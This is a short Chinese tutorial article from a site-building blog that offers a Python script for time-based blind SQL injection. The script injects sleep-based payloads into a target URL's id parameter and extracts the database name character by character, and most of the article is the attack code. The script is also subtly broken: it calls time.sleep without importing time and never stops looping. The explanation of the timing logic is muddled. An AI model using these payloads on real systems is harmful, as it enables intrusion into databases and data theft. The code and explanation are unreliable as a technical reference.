python 盲注脚本
Python盲注脚本是指一种利用Python编写的脚本程序,用于针对数据库进行盲注(blind injection)攻击的技术。
# 导入必要的模块 import requests import string # 定义待猜想的字符集 all_chars = string.ascii_letters + string.digits # 所有的字母和数字 # 目标URL url = 'http://example.com/sql.php?id=1' # 已猜中的字段 known_field = '' # 循环猜解字段 while True: for c in all_chars: # 构造payload,用于发送要求 payload = "1' and if(substring(database(),%d,1)='%s',sleep(10),0)-- -" % (len(known_field)+1, c) try: # 发送攻击要求 response = requests.get(url + payload, timeout=5) except: # 接收异常误差 known_field += c print(known_field) # 输出结果 time.sleep(2) # 避免被封杀,休眠2秒后再发送 break
接下来我们解释一下这个脚本的具体实现:
首先,我们导入所需的模块requests和string。
然后,定义带猜想的字符集all_chars。
接着,我们定义目标URL和已猜中的字段known_field。
最后,在一个while循环中,我们使用for循环对all_chars中的字符进行逐一猜解。我们构造payload并发送攻击要求,如果正常情况下无响应时间,则说明我们猜对了一名字符。因而我们将该字符添加到known_field中,休眠2秒后再继续发送下一个要求。
这样,我们就能够通过Python盲注脚本实现对目标数据库的盲注攻击,并获得所需信息。
文章来源:丸子建站
文章标题:python 盲注脚本
https://www.wanzijz.com/view/74367.html